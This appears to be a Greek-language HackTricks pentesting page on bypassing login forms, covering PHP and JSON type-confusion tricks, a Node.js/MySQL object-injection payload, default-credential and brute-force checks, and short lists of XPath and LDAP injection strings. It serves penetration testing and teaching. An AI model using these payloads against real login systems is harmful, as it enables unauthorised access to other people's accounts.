Login Bypass

Υποστήριξη HackTricks

RootedCON είναι η πιο σχετική εκδήλωση κυβερνοασφάλειας στην Ισπανία και μία από τις πιο σημαντικές στην Ευρώπη. Με αποστολή την προώθηση της τεχνικής γνώσης, αυτό το συνέδριο είναι ένα καυτό σημείο συνάντησης για επαγγελματίες της τεχνολογίας και της κυβερνοασφάλειας σε κάθε πειθαρχία.

Παράκαμψη κανονικής σύνδεσης

Αν βρείτε μια σελίδα σύνδεσης, εδώ μπορείτε να βρείτε μερικές τεχνικές για να προσπαθήσετε να την παρακάμψετε:

  • Ελέγξτε για σχόλια μέσα στη σελίδα (κύληση προς τα κάτω και προς τα δεξιά;)

  • Ελέγξτε αν μπορείτε να έχετε άμεση πρόσβαση στις περιορισμένες σελίδες

  • Ελέγξτε να μη στείλετε τις παραμέτρους (μη στείλετε καμία ή μόνο 1)

  • Ελέγξτε το σφάλμα συγκρίσεων PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Αλλάξτε τον τύπο περιεχομένου σε json και στείλτε τιμές json (συμπεριλαμβανομένου του bool true)

  • Αν λάβετε μια απάντηση που λέει ότι το POST δεν υποστηρίζεται, μπορείτε να προσπαθήσετε να στείλετε το JSON στο σώμα αλλά με αίτημα GET με Content-Type: application/json

  • Ελέγξτε το πιθανό σφάλμα ανάλυσης nodejs (διαβάστε αυτό): password[password]=1

  • Το nodejs θα μετατρέψει αυτό το payload σε ένα ερώτημα παρόμοιο με το εξής: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; το οποίο καθιστά το bit του κωδικού πρόσβασης πάντα true.

  • Αν μπορείτε να στείλετε ένα αντικείμενο JSON, μπορείτε να στείλετε "password":{"password": 1} για να παρακάμψετε τη σύνδεση.

  • Θυμηθείτε ότι για να παρακάμψετε αυτή τη σύνδεση πρέπει να γνωρίζετε και να στείλετε ένα έγκυρο όνομα χρήστη.

  • Προσθέτοντας την επιλογή "stringifyObjects":true κατά την κλήση του mysql.createConnection θα μπλοκάρει τελικά όλες τις απροσδόκητες συμπεριφορές όταν το Object περάσει ως παράμετρος.

  • Ελέγξτε τα διαπιστευτήρια:

  • Προεπιλεγμένα διαπιστευτήρια της τεχνολογίας/πλατφόρμας που χρησιμοποιείται

  • Κοινές συνδυασμοί (root, admin, password, όνομα της τεχνολογίας, προεπιλεγμένος χρήστης με έναν από αυτούς τους κωδικούς πρόσβασης).

  • Δημιουργήστε ένα λεξικό χρησιμοποιώντας Cewl, προσθέστε το προεπιλεγμένο όνομα χρήστη και κωδικό πρόσβασης (αν υπάρχει) και προσπαθήστε να το σπάσετε χρησιμοποιώντας όλες τις λέξεις ως ονόματα χρήστη και κωδικούς πρόσβασης

  • Brute-force χρησιμοποιώντας ένα μεγαλύτερο λεξικό (Brute force)

SQL Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω SQL injections.

Στην επόμενη σελίδα μπορείτε να βρείτε μια προσαρμοσμένη λίστα για να προσπαθήσετε να παρακάμψετε τη σύνδεση μέσω SQL Injections:

Login bypass List

No SQL Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω No SQL Injections.

Καθώς οι NoSQL Injections απαιτούν να αλλάξετε την τιμή των παραμέτρων, θα χρειαστεί να τις δοκιμάσετε χειροκίνητα.

XPath Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε τη σύνδεση μέσω XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Εδώ μπορείτε να βρείτε διάφορα κόλπα για να παρακάμψετε την είσοδο μέσω LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Θυμήσου Με

Αν η σελίδα έχει λειτουργία "Θυμήσου Με", έλεγξε πώς είναι υλοποιημένη και δες αν μπορείς να την εκμεταλλευτείς για να αναλάβεις άλλους λογαριασμούς.

Ανακατευθύνσεις

Οι σελίδες συνήθως ανακατευθύνουν τους χρήστες μετά την είσοδο, έλεγξε αν μπορείς να αλλάξεις αυτή την ανακατεύθυνση για να προκαλέσεις μια Ανοιχτή Ανακατεύθυνση. Ίσως μπορέσεις να κλέψεις κάποιες πληροφορίες (κωδικούς, cookies...) αν ανακατευθύνεις τον χρήστη στην ιστοσελίδα σου.

Άλλοι Έλεγχοι

  • Έλεγξε αν μπορείς να καταμετρήσεις ονόματα χρηστών εκμεταλλευόμενος τη λειτουργία εισόδου.

  • Έλεγξε αν η αυτόματη συμπλήρωση είναι ενεργή στις φόρμες κωδικού/ευαίσθητης πληροφορίας εισόδου: <input autocomplete="false"

​​RootedCON είναι το πιο σχετικό γεγονός κυβερνοασφάλειας στην Ισπανία και ένα από τα πιο σημαντικά στην Ευρώπη. Με αποστολή την προώθηση της τεχνικής γνώσης, αυτό το συνέδριο είναι ένα καυτό σημείο συνάντησης για επαγγελματίες τεχνολογίας και κυβερνοασφάλειας σε κάθε πειθαρχία.

Υποστήριξε το HackTricks

Last updated